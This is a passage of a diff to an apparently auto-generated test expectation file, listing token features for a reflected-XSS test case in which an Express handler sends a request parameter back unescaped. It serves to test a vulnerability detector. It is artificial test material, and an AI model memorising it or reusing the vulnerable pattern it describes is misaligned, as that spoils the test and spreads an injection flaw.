autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:18 | other.p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:18 | other.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:76:12:76:18 | other.p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:76:18:76:18 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:76:18:76:18 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:76:18:76:18 | p | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:76:18:76:18 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:76:18:76:18 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:14 | sortKeys | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:14 | sortKeys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:14 | sortKeys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:14 | sortKeys | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:37 | sortKey ... -keys') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:37 | sortKey ... -keys') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:37 | sortKey ... -keys') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:37 | sortKeys | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:37 | sortKeys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:7:79:37 | sortKeys | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:24 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:24 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:24 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:37 | exceptional return of require('sort-keys') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:37 | exceptional return of require('sort-keys') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:37 | exceptional return of require('sort-keys') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:37 | require('sort-keys') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:37 | require('sort-keys') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:79:18:79:37 | require('sort-keys') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:79:26:79:36 | 'sort-keys' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst2.js:79:26:79:36 | 'sort-keys' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:79:26:79:36 | 'sort-keys' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst2.js:79:26:79:36 | 'sort-keys' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst2.js:79:26:79:36 | 'sort-keys' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:79:26:79:36 | 'sort-keys' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:81:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:81:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:81:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:81:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:81:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:81:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:90:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:90:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:90:2 | app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:90:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:90:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:1:90:2 | exceptional return of app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:5:81:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:5:81:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:5:81:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:81:9:81:14 | '/baz' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:81:9:81:14 | '/baz' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:81:9:81:14 | '/baz' | calleeImports | express | @@ -22189,6 +147663,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:81:9:81:14 | '/baz' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:81:9:81:14 | '/baz' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:81:9:81:14 | '/baz' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | sortKeys | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | sortKeys | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | sortKeys | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | sortKeys | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | sortKeys | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | this | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:81:16 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | functio ... OT OK\\n} | calleeImports | express | @@ -22196,6 +147690,157 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | functio ... OT OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:17:90:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:26:81:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:81:31:81:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:11 | { p } | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:11 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:11 | { p } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | { p } = req.params | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:7:82:24 | { p } = req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:9:82:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:17 | req | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:17 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:17 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:24 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:24 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:24 | req.params | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:24 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:15:82:24 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:82:19:82:24 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:82:19:82:24 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:82:19:82:24 | params | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:82:19:82:24 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:82:19:82:24 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:9 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:9 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:9 | obj | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:9 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:9 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj = {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj = {} | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj = {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:84:7:84:14 | obj = {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:84:13:84:14 | {} | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:84:13:84:14 | {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:84:13:84:14 | {} | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:84:13:84:14 | {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:84:13:84:14 | {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:5 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:5 | obj | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:5 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:5 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:7 | obj.p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:7 | obj.p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:7 | obj.p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:7 | obj.p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:7 | obj.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:11 | obj.p = p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:11 | obj.p = p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:11 | obj.p = p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:11 | obj.p = p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:85:3:85:11 | obj.p = p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:85:7:85:7 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:85:7:85:7 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:85:7:85:7 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:85:7:85:7 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:85:7:85:7 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:85:11:85:11 | p | assignedToPropName | p | +| autogenerated/Xss/ReflectedXss/tst2.js:85:11:85:11 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:85:11:85:11 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:85:11:85:11 | p | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:85:11:85:11 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:85:11:85:11 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:11 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:11 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:11 | other | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:11 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:11 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other = ... ys(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other = ... ys(obj) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other = ... ys(obj) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other = ... ys(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:86:7:86:27 | other = ... ys(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:22 | sortKeys | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:22 | sortKeys | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:22 | sortKeys | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:22 | sortKeys | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:22 | sortKeys | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | exceptional return of sortKeys(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | exceptional return of sortKeys(obj) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | exceptional return of sortKeys(obj) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | exceptional return of sortKeys(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | exceptional return of sortKeys(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | sortKeys(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | sortKeys(obj) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | sortKeys(obj) | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | sortKeys(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:86:15:86:27 | sortKeys(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:86:24:86:26 | obj | CalleeFlexibleAccessPath | sortKeys | | autogenerated/Xss/ReflectedXss/tst2.js:86:24:86:26 | obj | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:86:24:86:26 | obj | calleeImports | sort-keys | @@ -22204,6 +147849,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:86:24:86:26 | obj | enclosingFunctionBody | req res p req params obj obj p p other sortKeys obj res send p res send other p | | autogenerated/Xss/ReflectedXss/tst2.js:86:24:86:26 | obj | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:86:24:86:26 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:88:3:88:5 | res | 